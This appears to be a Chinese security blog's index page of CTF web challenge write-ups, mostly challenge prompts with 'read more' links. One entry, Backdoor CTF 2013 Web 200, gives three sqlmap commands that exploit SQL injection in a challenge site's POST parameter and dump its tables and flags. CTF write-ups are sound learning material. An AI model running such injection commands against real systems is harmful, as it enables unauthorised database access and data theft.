EasyCTF 2017 Web Write Up

作者: 分类: CTF 评论: 暂无 时间: 2017-04-09 浏览: 1,643 次

作者:Jing Ling
博客:HackFun

0x05 Web

Cookie Blog

problem

I found the cookie monster's blog!

阅读全文»

CSAW CTF Qualification Round 2013: Web 200 Nevernote

作者: 分类: CTF 评论: 暂无 时间: 2016-08-19 浏览: 5,556 次

0x00 题目

来自网站http://128.238.66.214的管理员Nevernote Admin<nevernoteadmin@nevernote.com>
发往邮箱challenger@ctf.isis.poly.edu
时间:2013年9月19日 星期四 15:05
主题:求助

亲爱的小伙伴:
邪恶的黑客已经控制了我的Nevernote网站服务器并且锁定了我的管理帐户是我不能登入,我正在尝试恢复访问,你有没有办法登入我的帐户帮我把notes保存下来吗?虽说网站的安全性较高,但是对于你应该没有问题,我看好你,加油!
..........................................................................................................................................谢谢,Nevernote网站管理员

0x01 解题

阅读全文»

CSAW CTF Qualification Round 2013: Web 100 Guess Harder

作者: 分类: CTF 评论: 暂无 时间: 2016-08-19 浏览: 3,014 次

0x00 题目

http://128.238.66.215

0x01 解题

阅读全文»

Backdoor CTF 2013: Web 300

作者: 分类: CTF 评论: 暂无 时间: 2016-08-13 浏览: 3,896 次

0x00 题目

H4x0r的网站系统需要积分,为你账号获得积分从而获取flag,你可以审计一波网站系统源代码
提示:管理员有一堆积分,就看你能不能用了。

0x01 解题

阅读全文»

Backdoor CTF 2013: Web 500

作者: 分类: CTF 评论: 暂无 时间: 2016-08-13 浏览: 3,016 次

0x00 题目

有人提醒了H4x0r他的Web150新闻网站存在漏洞,所以H4x0r加固了网站。你现在需要找到网站管理用户的密码散列从而得到flag。

阅读全文»

Backdoor CTF 2013: Web 200

作者: 分类: CTF 评论: 暂无 时间: 2016-08-13 浏览: 2,187 次

0x00 题目

H4x0r在某个地方藏了一个flag,找到flag

0x01 解题

post的q参数没有过滤处理:

sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10
sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10 --tables
sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10 --sql-query="select * from flags"

Backdoor CTF 2013: Web 150

作者: 分类: CTF 评论: 暂无 时间: 2016-08-11 浏览: 3,279 次

0x00 题目

现在,你发现了H4x0r的公告网,这个站点在很久之前就建立了,所以有可能存在一些漏洞。
找到网站管理员密码的MD5值。

阅读全文»

Backdoor CTF 2013: Web 50

作者: 分类: CTF 评论: 2条 时间: 2016-08-06 浏览: 6,976 次

0x00 题目

H4x0r,一天早上,为自己的网站搞了一个身份验证系统。他很自然觉得自己搞了一个先进高端的系统,然而我们是知道他是多么"出色的"。成为管理员非常容易,你可以访问这个链接的轻松获取flag。

0x01 解题

阅读全文»